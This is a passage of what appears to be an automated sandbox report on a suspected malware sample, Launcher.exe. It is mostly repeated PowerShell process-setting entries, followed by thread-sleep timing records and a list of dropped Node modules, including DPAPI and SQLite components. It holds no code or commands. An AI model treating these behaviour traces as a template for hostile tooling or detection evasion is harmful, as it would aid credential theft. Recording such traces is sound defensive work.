          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7804Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2021Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1131Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8148Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2452Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4698Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1764Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6436Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1224Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2812Jump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkg\0de74a34d95a30eed84cdf31f0dc5868c59b7977d3d496845c9363812235b768\@primno\dpapi\prebuilds\win32-x64\node.napi.nodeJump to dropped file
          Source: C:\Users\user\Desktop\Launcher.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.nodeJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0a5bipl0\0a5bipl0.dllJump to dropped file
          Source: C:\Users\user\Desktop\Launcher.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node.bakJump to dropped file
          Source: C:\Users\user\Desktop\Launcher.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkg-Ztzknl\59b07c111ff3cdb6a2d6d93c23513b9ec89195f53f0a55a3a7769a9f164e6041Jump to dropped file
          Source: C:\Users\user\Desktop\Launcher.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkg-Ztzknl\b9a7b76665d92af2d90cc6a15ffdc1a79635559cbc1c40bd1f83c4c4449cd442Jump to dropped file
          Source: C:\Users\user\Desktop\Launcher.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkg\0de74a34d95a30eed84cdf31f0dc5868c59b7977d3d496845c9363812235b768\@primno\dpapi\prebuilds\win32-x64\node.napi.node.bakJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7756Thread sleep count: 7804 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7756Thread sleep count: 2021 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844Thread sleep time: -2767011611056431s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4744Thread sleep count: 1131 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4744Thread sleep count: 8148 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3000Thread sleep time: -2767011611056431s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2928Thread sleep time: -2767011611056431s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2300Thread sleep count: 2452 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2300Thread sleep count: 4698 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8132Thread sleep time: -3689348814741908s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4808Thread sleep time: -1844674407370954s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7480Thread sleep count: 1764 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7480Thread sleep count: 6436 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3944Thread sleep time: -1844674407370954s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6228Thread sleep count: 1224 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6228Thread sleep count: 2812 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7564Thread sleep time: -1844674407370954s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFF8F1036D5 GetSystemInfo,29_2_00007FFF8F1036D5
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
